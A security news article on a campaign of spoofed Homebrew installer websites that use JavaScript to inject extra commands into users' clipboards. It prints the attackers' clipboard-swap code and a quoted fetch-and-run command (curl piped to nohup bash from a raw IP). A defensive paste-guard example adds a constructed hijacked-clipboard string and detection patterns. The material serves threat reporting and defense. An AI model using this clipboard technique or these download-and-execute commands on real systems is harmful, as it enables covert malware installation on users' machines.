Hackers Attacking macOS Users With Spoofed Homebrew Websites to Inject Malicious Payloads

Posted on October 14, 2025 By CWS

A sophisticated campaign targeting macOS users has emerged via spoofed Homebrew installer websites that deliver malicious payloads alongside legitimate package manager installations.

The attack exploits the widespread trust users place in the popular Homebrew package manager by creating pixel-perfect replicas of the official brew[.]sh installation page, complete with deceptive clipboard manipulation techniques.

Security researchers have identified several fraudulent domains mimicking the legitimate Homebrew website, including homebrewfaq[.]org, homebrewclubs[.]org, and homebrewupdate[.]org.

These malicious sites present convincing replicas of the official installation interface but include hidden JavaScript designed to inject additional commands into users' clipboards without their knowledge.

Unlike the genuine Homebrew page, which allows manual text selection, these spoofed versions force users to use a designated Copy button, enabling attackers to insert malicious payloads alongside the standard installation command.

Homebrew installation page (Source: The Sequence)

The campaign represents a significant evolution in supply chain attacks, targeting not the package repositories themselves but the initial installation process.

While Homebrew has maintained a strong security track record with no recent compromises, threat actors have found an effective workaround by impersonating the trusted installation source.

Spoofed Homebrew installation page (Source: The Sequence)

The Sequence analysts identified this emerging threat pattern through systematic monitoring of suspicious domains and infrastructure associated with known malware distribution networks.

The attack methodology demonstrates notable sophistication in its execution and evasion capabilities.

Rather than compromising legitimate package repositories, attackers have built a parallel infrastructure that intercepts users during the critical installation phase.

This approach bypasses traditional security measures focused on repository monitoring while exploiting the inherent trust users place in familiar installation procedures.

Advanced Clipboard Manipulation Techniques

The core infection mechanism relies on JavaScript-based clipboard manipulation that operates transparently to the victim.

When users click the Copy button on spoofed sites, embedded code executes a series of operations designed to inject malicious commands alongside the expected Homebrew installation script.

The JavaScript implementation includes Russian-language comments explicitly indicating where malicious commands should be inserted, suggesting a commodity-style threat service.

The malicious script prevents standard text selection through event listeners that disable the contextmenu, selectstart, copy, cut, and dragstart events on the installation block.

This forces victims to use the provided Copy button, which triggers the copyInstallCommand() function. The function writes a predetermined command to the clipboard using either the modern Clipboard API or a fallback textarea method for compatibility across different browser environments.

const copyCommand = 'echo '; // ← replace with the required one
async function copyInstallCommand () {
  // Write the attacker-chosen string, not the text shown on the page, to the clipboard
  await navigator.clipboard.writeText(copyCommand);
  // Report the copy event back to the spoofed site's server
  fetch('notify.php', {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ event: 'copy_install_command', time: new Date() })
  });
}

Analysis revealed that active campaigns use commands such as curl -s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash &, which downloads and executes additional payloads in the background while the legitimate Homebrew installation proceeds normally, creating an effective dual-execution scenario that maintains operational stealth while establishing persistent access to compromised systems.
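The defensive counterpart to the technique described above is a paste guard: compare what the page visibly showed the user with what actually landed on the clipboard, and inspect any extra command before the text reaches a shell. The following is an added example written for this article, not code from The Sequence, the campaign, or the Homebrew project. It assumes the official Homebrew one-liner as the known-good reference; the hijacked clipboard sample is constructed for the demo and uses a documentation-range IP (198.51.100.7), not a host from the campaign.

```javascript
// Added example (not code from the article, The Sequence, or Homebrew): a
// paste-guard check for clipboard hijacking on install pages. It splits the
// clipboard text into top-level shell commands, removes the command the user
// actually saw, and reports indicators on whatever remains.

const OFFICIAL_BREW_INSTALL =
  '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"';

// Constructed sample of a hijacked clipboard: a fetch-and-run chain is placed
// in front of the genuine install command so both execute on paste.
// 198.51.100.7 is a documentation-range address, not a real host.
const CONSTRUCTED_HIJACKED_CLIPBOARD =
  'curl -s http://198.51.100.7/d/payload | nohup bash & ' + OFFICIAL_BREW_INSTALL;

// Indicators worth reporting on any command the user did not see on screen.
const RISK_PATTERNS = [
  { id: 'remote-fetch', re: /\b(curl|wget)\b/ },
  { id: 'shell-interpreter', re: /\b(bash|sh|zsh)\b/ },
  { id: 'background-exec', re: /\bnohup\b/ },
  { id: 'raw-ip-url', re: /https?:\/\/\d{1,3}(\.\d{1,3}){3}/ },
];

// Split a one-liner into top-level commands on ; | & && || and newlines,
// leaving anything inside quotes or $( ... ) intact. A command followed by a
// single '&' is marked as backgrounded.
function splitCommands(text) {
  const parts = [];
  let cur = '';
  let quote = null;
  let depth = 0; // $( ... ) nesting outside quotes
  const push = (backgrounded) => {
    if (cur.trim()) parts.push({ text: cur.trim(), backgrounded });
    cur = '';
  };
  for (let i = 0; i < text.length; i++) {
    const ch = text[i];
    const next = text[i + 1];
    if (quote) {
      cur += ch;
      if (ch === quote) quote = null;
      continue;
    }
    if (ch === "'" || ch === '"') { quote = ch; cur += ch; continue; }
    if (ch === '$' && next === '(') { depth++; cur += '$('; i++; continue; }
    if (ch === ')' && depth > 0) { depth--; cur += ch; continue; }
    if (depth === 0) {
      if ((ch === '&' || ch === '|') && next === ch) { push(false); i++; continue; }
      if (ch === '&') { push(true); continue; }
      if (ch === ';' || ch === '|' || ch === '\n') { push(false); continue; }
    }
    cur += ch;
  }
  push(false);
  return parts;
}

// Compare the displayed command with the clipboard contents. Every clipboard
// command that is not the displayed one is reported with its indicators.
function analyzeClipboardCommand(displayed, clipboard) {
  const shown = displayed.trim();
  const commands = splitCommands(clipboard);
  const injected = commands.filter((c) => c.text !== shown);
  const findings = injected.map((c) => ({
    command: c.text,
    backgrounded: c.backgrounded,
    indicators: RISK_PATTERNS.filter((p) => p.re.test(c.text)).map((p) => p.id),
  }));
  return {
    verdict: injected.length === 0 ? 'allow' : 'block',
    injectedCount: injected.length,
    findings,
  };
}

// Stand-alone run: the genuine command passes, the hijacked clipboard is blocked.
console.log(analyzeClipboardCommand(OFFICIAL_BREW_INSTALL, OFFICIAL_BREW_INSTALL).verdict);
console.log(JSON.stringify(
  analyzeClipboardCommand(OFFICIAL_BREW_INSTALL, CONSTRUCTED_HIJACKED_CLIPBOARD), null, 2));
```

The same check works wherever the displayed text is available: a browser extension can pass the visible text of the code block and the string handed to `navigator.clipboard.writeText`, and a terminal paste hook can pass the clipboard against a list of vetted install commands. Exact comparison is deliberate; the article's point is that the copied text silently differs from what the page shows, so any difference, not just a recognised pattern, is grounds to block.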
